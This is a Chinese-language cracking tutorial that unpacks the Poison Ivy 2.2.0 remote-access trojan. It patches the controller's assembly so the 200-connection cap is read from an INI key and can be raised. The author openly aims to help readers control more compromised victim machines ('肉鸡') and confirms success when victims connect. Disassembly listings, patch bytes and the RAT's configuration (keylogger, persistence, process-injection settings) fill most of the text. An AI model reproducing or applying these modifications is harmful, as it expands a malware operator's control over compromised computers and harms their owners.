当当养“鸡”专业户：pi2.2.0脱壳及连接200限制去除逆向工程

【文章标题】: 当当养“鸡”专业户！

【文章作者】: KOOK1991

【作者邮箱】: WeKnow@163.com

【作者QQ号】: 371161181

【软件名称】: Poison Ivy 2.2.0

【下载地址】: http://www.poisonivy-rat.com/

【加壳方式】: 未知

【编写语言】: Borland Delphi 6.0 - 7.0

【使用工具】: OllyICE、LoadPE、ImportREC、Topo

【操作平台】: Win9x/NT/2000/XP

【软件介绍】: 国外知名木马，服务端才几KB，强！

【作者声明】: 我是菜鸟我怕谁！！！

--------------------------------------------------------------------------------

【详细过程】

初中的时候一直认为拥有几千台肉鸡才叫“黑客”。眨眼间，两三年过去了，终于理解了“黑客”的真意，决心来看雪好

好学学。无奈高手太多，使我无地自容，近来偶有感想，便拿出来显摆显摆……

Poison Ivy，知道吧？很有名气的木马，可就不知道为啥在国内火不起来，但我挺爱用。（受不了一些哥们，这么小的木

马不用，成天背着几百KB的鸽子满天飞……）好东西总有限制，Poison Ivy 2.2.0也不例外，限制最大连接数为２００。

于是我抄起了家伙，上路了……

首先，阐述一下这回的破解目标：

对Poison Ivy 2.2.0进行逆向工程，增加自定义最大连接数的功能，以方便我们使用。让更多的人成为养“鸡”专业户，

从而脱贫、致富、奔小康！！！！！！

用PEiD查不出来壳，无奈。直接用OllyICE上，停在入口点：

005A3060 >60pushad

005A3061E8 00000000 call005A3066

005A30665Dpop ebp

005A306781ED 725B4000 sub ebp, 00405B72

005A306D64:A1 30000000mov eax, dword ptr fs:[30]

005A30730FB640 02 movzx eax, byte ptr [eax 2]

005A30770AC0oral, al

005A307974 04 jeshort 005A307F

005A307B33C0xor eax, eax

经验太少，看不出是什么壳:-(直接上。走过005A3060，直接用ESP定律“HE 0012FFA4”，F9运行，卡到这里：

005A371150pusheax; PI.005A36C0

005A371233C0xor eax, eax

005A371464:FF30 pushdword ptr fs:[eax]

005A371764:8920 mov dword ptr fs:[eax], esp

005A371AEB 01 jmp short 005A371D

005A371C8700xchgdword ptr [eax], eax

005A371E0000add byte ptr [eax], al

005A37200000add byte ptr [eax], al

005A37220000add byte ptr [eax], al

005A37240000add byte ptr [eax], al

F8一路向前

005A371D0000add byte ptr [eax], al ; 访问违规：正在写入到[00000000]

Shift F8，来到：

7C92EAF08B1C24mov ebx, dword ptr [esp]

7C92EAF351pushecx

7C92EAF453pushebx

7C92EAF5E8 C78C0200 call7C9577C1

7C92EAFA0AC0oral, al

7C92EAFC74 0C jeshort 7C92EB0A

7C92EAFE5Bpop ebx

7C92EAFF59pop ecx

7C92EB006A 00 push0

7C92EB0251pushecx

7C92EB03E8 11EBFFFF callZwContinue

7C92EB08EB 0B jmp short 7C92EB15

7C92EB0A5Bpop ebx

7C92EB0B59pop ecx

7C92EB0C6A 00 push0

7C92EB0E51pushecx

7C92EB0F53pushebx

7C92EB10E8 3DF7FFFF callZwRaiseException

Alt F9返回：

00519B3300B0 97510055 add byte ptr [eax 55005197], dh

00519B398BECmov ebp, esp ; 来到这里

00519B3B83C4 F0 add esp, -10

00519B3EB8 D8975100 mov eax, 005197D8

00519B43E8 1CD0EEFF call00406B64

00519B48A1 ACCF5100 mov eax, dword ptr [51CFAC]

00519B4D8B00mov eax, dword ptr [eax]

00519B4FE8 1822F7FF call0048BD6C

00519B54A1 ACCF5100 mov eax, dword ptr [51CFAC]

00519B598B00mov eax, dword ptr [eax]

00519B5BBA 989B5100 mov edx, 00519B98; ASCII "Poison Ivy"

00519B60E8 FF1DF7FF call0048B964

00519B658B0D 90CE5100 mov ecx, dword ptr [51CE90]; PI.0051F368

00519B6BA1 ACCF5100 mov eax, dword ptr [51CFAC]

00519B708B00mov eax, dword ptr [eax]

00519B728B15 E8FB5000 mov edx, dword ptr [50FBE8]; PI.0050FC34

00519B78E8 0722F7FF call0048BD84

哈哈，来到OEP，很熟悉的Delphi开头。用LoadPE修正镜像大小，完全Dump。再打开ImportREC，OEP填上00119B38，自动查

找INT -> 获取输入表 -> Fix Dump，脱壳OK~~~~~

为了保险起见，再用PEiD查一下脱壳后的文件――“Borland Delphi 6.0 - 7.0”，呵呵，没错，就是你！！

用Dede打开脱壳后的Poison Ivy，Dede卡住了，看来作者不是吃素的。

只好用OllyICE载入脱壳后的Poison Ivy -> Ultra String Reference -> Find ASCII。看了半天，终于找到了一句有用的

String：

Ultra String Reference, 条目 1813

Address=0051170A

Disassembly=mov edx, 00511844

Text String=please assign a password for the connection:

Ultra String Reference, 条目 1814

Address=0051170F

Disassembly=mov eax, 0051187C

Text String=new connection

直接双击来到这里

005116CD|.50pusheax; /Parm

005116CE|.68 7E660480 push8004667E ; |Cmd = FIONBIO

005116D3|.56pushesi; |Socket

005116D4|.E8 D7BDF7FF call ; \ioctlsocket

005116D9|.81BB 3C070000>cmp dword ptr [ebx 73C], 0C8

005116E3|.7C 0B jlshort 005116F0

005116E5|.56pushesi; /Socket

005116E6|.E8 8DBDF7FF call; \closesocket

005116EB|.E9 F7000000 jmp 005117E7

005116F0|>8D45 F4 lea eax, dword ptr [ebp-C]

005116F3|.8B15 ACF35100 mov edx, dword ptr [51F3AC]

005116F9|.E8 0632EFFF call00404904

005116FE|.803D 9DF35100>cmp byte ptr [51F39D], 0

00511705|.74 12 jeshort 00511719

00511707|.8D4D F4 lea ecx, dword ptr [ebp-C]

0051170A|.BA 44185100 mov edx, 00511844;please assign a password for the connection:

0051170F|.B8 7C185100 mov eax, 0051187C;new connection

00511714|.E8 AB41F2FF call004358C4

00511719|>8D4D C8 lea ecx, dword ptr [ebp-38]

哈哈，众里寻他千百度，蓦然回首――小样，你在这啊：

005116D9|.81BB 3C070000 C8000000 cmp dword ptr [ebx 73C], 0C8 ; 比较当前连接数和0C8（就是200嘛）

005116E3|.7C 0Bjlshort 005116F0 ; 小于200则跳

005116E5|.56 pushesi; /Socket

005116E6|.E8 8DBDF7FFcall; \closesocket 断开连接

可见在005116DF处的C8000000就是最大连接数，记住这个地址，后面有用的哦。

找到了判断最大连接数的地方，可以直接把005116E3改成JMP，但有一点，假如你肉鸡太多，岂不被DDos了？看来这点还不

够，我们还得控制最大连接数，也就是让程序随我们的意愿来自动修改005116DF处的最大连接数。考虑了半天，我决定用

Poison Ivy的配置文件Poison Ivy.ini来保存欲设的最大连接数，以便我们在具体应用时方便地修改。

先看看Poison Ivy.ini的内容吧！

[Disclaimer]; 软件的启动模式（是否显示使用协议）

Show=1

[Placement] ; 软件的窗口及控件的大小设置

MaximizedState=0

Top=491

Left=330

Width=744

Height=231

ConTop=145

ConLeft=110

ConWidth=650

ConHeight=380

Column0=50

Column1=90

Column2=90

Column3=80

Column4=80

Column5=60

Column6=45

Column7=63

Column8=67

Column9=50

Column10=57

DataTransfers=0

[Settings] ; 很明显是有关控制端的配置信息，就把最大连接数存这吧

ScrSize=75

ScrBits=24

ShareTo=

ShareToSocks=

ShareSocks=0

Port=3460

Password=admin

BalloonTip=1

MinimizeTray=1

CloseTray=0

Prompt=0

PromptExit=0

SimTransfers=2

SDrounds=3

Cache=1

WindowColor=1

TimestampColor=1

KeynameColor=1

WindowName=008000

Timestamp=0000FF

Keyname=808080

PromptDelete=1

AutoRefresh=0

TreeLayout=1

AutoLookUpdates=1

AutoRemove=1

HidePW=0

[Connection]; 配置被控端的信息1

DNS=127.0.0.1:3460,

ID=

Password=admin

Socks4=0

S4DNS=

[Startup] ; 配置被控端的信息2

Startup=0

ActiveXKey={1B4B734A-CC89-9B4A-0705-060108040104}

[Installation]

Filename=

Copy=0

CopySystem=1

Copywindows=0

Melt=0

Keylogger=0

Persistence=0

[Advanced]; 配置被控端的信息3

ProcessMutex=)!VoqA.I4

KeyLoggerMutex=VLC9032Ca

CustomInject=0

CustomInjectProc=msnmsgr.exe

我就决定在[Settings]里添加一个子项“Crack”，用它来控制最大连接数，OK，开工！！！！

要在配置文件中添加最大连接数的信息，最重要的就是读出最大连接数，那我没就必须找到程序是如何读配置文件的。重

新回到OllyICE中看String：

Ultra String Reference, 条目 1931

Address=00514609

Disassembly=mov edx, 00514C28

Text String=settings

Ultra String Reference, 条目 2070

Address=0051591E

Disassembly=mov edx, 00516828

Text String=settings

其中有很多的Settings，我只选了两处，因为其他的Settings都分布在这两处附近：

00514609处：

005145EB|.50pusheax

005145EC|.B9 5C4C5100 mov ecx, 00514C5C;sharetosocks

005145F1|.BA 284C5100 mov edx, 00514C28;settings

005145F6|.8B45 FC mov eax, dword ptr [ebp-4]

005145F9|.8B30mov esi, dword ptr [eax]

005145FB|.FF56 04 calldword ptr [esi 4]

005145FE|.A0 A7F35100 mov al, byte ptr [51F3A7]

00514603|.50pusheax

00514604|.B9 744C5100 mov ecx, 00514C74;sharesocks

00514609|.BA 284C5100 mov edx, 00514C28;settings

0051460E|.8B45 FC mov eax, dword ptr [ebp-4]

00514611|.8B30mov esi, dword ptr [eax]

00514613|.FF56 14 calldword ptr [esi 14]

00514616|.A1 7CF35100 mov eax, dword ptr [51F37C]

0051461B|.50pusheax

0051461C|.B9 884C5100 mov ecx, 00514C88;port

00514621|.BA 284C5100 mov edx, 00514C28;settings

00514626|.8B45 FC mov eax, dword ptr [ebp-4]

00514629|.8B30mov esi, dword ptr [eax]

0051462B|.FF56 0C calldword ptr [esi C]

0051462E|.A1 ACF35100 mov eax, dword ptr [51F3AC]

00514633|.50pusheax

00514634|.B9 984C5100 mov ecx, 00514C98;password

00514639|.BA 284C5100 mov edx, 00514C28;settings

0051463E|.8B45 FC mov eax, dword ptr [ebp-4]

00514641|.8B30mov esi, dword ptr [eax]

00514643|.FF56 04 calldword ptr [esi 4]

00514646|.A0 9AF35100 mov al, byte ptr [51F39A]

0051591E处：

005158F8 .50pusheax

005158F9 .B9 5C685100 mov ecx, 0051685C;sharetosocks

005158FE .BA 28685100 mov edx, 00516828;settings

00515903 .8B45 F8 mov eax, dword ptr [ebp-8]

00515906 .8B18mov ebx, dword ptr [eax]

00515908 .FF13calldword ptr [ebx]

0051590A .8B55 A4 mov edx, dword ptr [ebp-5C]

0051590D .B8 B4F35100 mov eax, 0051F3B4

00515912 .E8 A9EFEEFF call004048C0

00515917 .6A 00 push0

00515919 .B9 74685100 mov ecx, 00516874;sharesocks

0051591E .BA 28685100 mov edx, 00516828;settings

00515923 .8B45 F8 mov eax, dword ptr [ebp-8]

00515926 .8B18mov ebx, dword ptr [eax]

00515928 .FF53 10 calldword ptr [ebx 10]

0051592B .A2 A7F35100 mov byte ptr [51F3A7], al

00515930 .68 840D0000 push0D84

00515935 .B9 88685100 mov ecx, 00516888;port

0051593A .BA 28685100 mov edx, 00516828;settings

0051593F .8B45 F8 mov eax, dword ptr [ebp-8]

00515942 .8B18mov ebx, dword ptr [eax]

00515944 .FF53 08 calldword ptr [ebx 8]

00515947 .A3 7CF35100 mov dword ptr [51F37C], eax

0051594C .68 98685100 push00516898

00515951 .8D45 A0 lea eax, dword ptr [ebp-60]

00515954 .50pusheax

00515955 .B9 A8685100 mov ecx, 005168A8;password

0051595A .BA 28685100 mov edx, 00516828;settings

0051595F .8B45 F8 mov eax, dword ptr [ebp-8]

00515962 .8B18mov ebx, dword ptr [eax]

00515964 .FF13calldword ptr [ebx]

00515966 .8B55 A0 mov edx, dword ptr [ebp-60]

具体谁是程序开始运行时读取Poison Ivy.ini的地方，不知道。分别下断点，0051591E在开始时断下来，00514609在结束

时断下来，可见0051591E是读取Poison Ivy.ini，00514609是保存Poison Ivy.ini，知道了这些，继续！！

分析一下，程序是如何读取Poison Ivy.ini里的内容的：

00515930 .68 840D0000 push0D84 ;压入默认端口

00515935 .B9 88685100 mov ecx, 00516888;portINI中保存端口信息的子项名称

0051593A .BA 28685100 mov edx, 00516828;settingsINI中保存端口信息的项名称

0051593F .8B45 F8 mov eax, dword ptr [ebp-8]

00515942 .8B18mov ebx, dword ptr [eax]

00515944 .FF53 08 calldword ptr [ebx 8];进行读取

00515947 .A3 7CF35100 mov dword ptr [51F37C], eax;把读取的值保存到51F37C

00515930处之所以要把默认端口压入，是因为程序怕在读不出配置文件中port这一子项时，使用０来做端口导致出错，可

见“push0D84”的作用是让程序在00515944读不出配置文件该项时采用备用值0D84。

好了，打开Topo差入100字节代码空间，（本人懒得去找了可用空间了，还是用工具吧，100字节肯定够用。）Topo中显示

100字节加到了005A3A33，下面开始添加代码：

首先，用OllyICE二进制编辑005A3A33，加入字符串“Crack”。（别忘了在“Crack”后加“00”。）

接着，在005A3A39处添加我们的代码：

005A3A3968 840D0000 push0C8; 压入默认最大连接数，保存备用值200

005A3A3EB9 333A5A00 mov ecx, 005A3A33; ASCII "Crack" INI中保存最大连接数的子项名称

005A3A43BA 28685100 mov edx, 00516828; ASCII "Settings"INI中保存最大连接数的项名称

005A3A488B45 F8 mov eax, dword ptr [ebp-8]

005A3A4B8B18mov ebx, dword ptr [eax]

005A3A4DFF53 08 calldword ptr [ebx 8]; 进行读取

005A3A50A3 DF165100 mov dword ptr [5116DF], eax; 把读取的最大连接数保存到上文提到的005116DF处，替换原来的最大连接数

方便起见，就让程序从00515930处跳到我们这里吧，即：

00515930 .68 840D0000 push0D84

改为：

00515930 .- E9 04E10800 jmp 005A3A39

为了使程序正常运行我们还要在005A3A50的下面加入如下代码：

005A3A5568 840D0000 push0D84 ; 把00515930原有功能修改了，最后还是要加上的，所谓“有借有还，再借不难”

005A3A5A- E9 D61EF7FF jmp 00515935 ; 回归原位，这就相当于台湾再咋拗，到头还是得回归咱中国，呵呵:-)

OK，用OllyICE保存EXE文件，让我来测试一下……

打开Poison Ivy.ini在[Settings]下加入Crack=0，呵呵一个也连接不上了。把Crack=0改为10000，哈哈，肉鸡出现了！！

再把Crack=0删除，哦~~~~，肉鸡又出现了！！！！！成功！！！！！

最后，给有对本文兴趣的朋友留个小作业：继续对00514609处进行逆向工程，使程序可以在关闭时自动保存当前的最大连

接数……OK，就到这把！！！